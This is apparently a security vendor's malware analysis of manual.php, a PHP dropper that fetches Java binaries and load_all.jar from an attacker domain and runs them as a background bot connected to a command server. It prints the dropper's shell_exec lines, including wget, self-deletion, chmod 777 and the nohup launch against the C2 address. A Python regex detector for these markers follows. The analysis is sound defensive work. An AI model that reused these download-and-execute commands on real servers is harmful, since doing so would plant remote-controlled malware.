load_all.jar

Today we found Java based malware. If an attacker finds a File Upload vulnerability on the server, they upload a manual.php based dropper, which tries to load load_all.jar onto the server and run it in the background.

Manual.php

$out = shell_exec("java -version 2>&1");
preg_match("/version\s+\"1\.(\d+)\./",$out,$matches);
$ver = 0;
if($matches)$ver = (int)$matches[1];

This manual.php relies heavily on the shell_exec function, so if you have disabled shell_exec in php.ini (disable_functions), you are secure from this malware.

Check java version

If this malware can't find an installed JAVA on the server, it downloads JAVA binary files to the server:

shell_exec("export JAVA_HOME=".dirname(__FILE__)."/tmp");

shell_exec("rm ".__FILE__);

shell_exec("pkill java");
if((defined('PHP_INT_SIZE'))&&(PHP_INT_SIZE == 8)){
shell_exec("wget hxxp://recaptcha-in.pw/64/tmp.tar.gz");
shell_exec("tar -xzf tmp.tar.gz");
shell_exec("rm tmp.tar.gz");
}else{
shell_exec("wget hxxp://recaptcha-in.pw/32/tmp.tar.gz");
shell_exec("tar -xzf tmp.tar.gz");
shell_exec("rm tmp.tar.gz");
}

There is also a Linux bash rm command, so the script also removes itself (manual.php) from the server.

Execution of load_all.jar

Finally, it downloads the load_all.jar file again (after first downloading the JAVA binaries, if those were needed).

chdir("tmp/bin");
shell_exec("rm load_all.jar");
shell_exec("wget hxxp://recaptcha-in.pw/load_all.jar");
shell_exec("chmod 777 -R .");
shell_exec("nohup ./java -jar load_all.jar hxxp://83.166.243.65/b");

The last command starts this JAVA malware as a background task and connects it to the remote Command server.
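As an added example (not code from the original post or from Malware Expert), a small Python check that flags PHP files carrying the behavioural markers described above, regardless of which domain or IP the dropper points at; the sample inputs are constructed from the fragments quoted in this post and nothing is fetched or executed:

```python
import re
from typing import Dict, List

# Behavioural markers of the manual.php dropper described above, as regexes
# over PHP source. Domains and IPs are deliberately not matched so the check
# still fires when the attacker rotates hosting.
INDICATORS: Dict[str, str] = {
    "shell_exec": r"\bshell_exec\s*\(",
    "java_version_probe": r"java\s+-version",
    "self_delete": r'"rm\s*"\s*\.\s*__FILE__',
    "kill_java": r"\bpkill\s+java\b",
    "fetch_archive": r"\bwget\s+\S+\.(?:tar\.gz|jar)\b",
    "world_writable": r"\bchmod\s+777\s+-R\b",
    "background_jar": r"\bnohup\s+\S*java\s+-jar\s+\S+\.jar\b",
}

def scan_php_source(src: str) -> List[str]:
    """Names of the indicators found in one PHP source text, in table order."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, src)]

def is_java_dropper(src: str, min_markers: int = 3) -> bool:
    """shell_exec is required but never sufficient (admin scripts use it too);
    at least min_markers further behavioural markers must also be present."""
    hits = scan_php_source(src)
    return "shell_exec" in hits and len(hits) - 1 >= min_markers

# Constructed sample built from the fragments quoted in the post; URLs stay
# defanged (hxxp) and the text is only pattern-matched, never run.
SAMPLE_DROPPER = r'''<?php
$out = shell_exec("java -version 2>&1");
shell_exec("rm ".__FILE__);
shell_exec("pkill java");
shell_exec("wget hxxp://recaptcha-in.pw/64/tmp.tar.gz");
shell_exec("chmod 777 -R .");
shell_exec("nohup ./java -jar load_all.jar hxxp://83.166.243.65/b");
'''

# Constructed benign script: a single shell_exec probing the JDK is not enough.
SAMPLE_BENIGN = '<?php\n$v = shell_exec("java -version 2>&1");\necho $v;\n'

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_DROPPER), is_java_dropper(SAMPLE_DROPPER))
    print(scan_php_source(SAMPLE_BENIGN), is_java_dropper(SAMPLE_BENIGN))
```

Point the same functions at the contents of each .php file under the web root to sweep a whole site; the marker threshold keeps ordinary admin scripts that merely call shell_exec from being flagged.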

Final Words

Use Malware Expert – Signatures to detect this malware in your files for FREE!

Websites using Malware Expert – ModSecurity rules are protected against this kind of attack.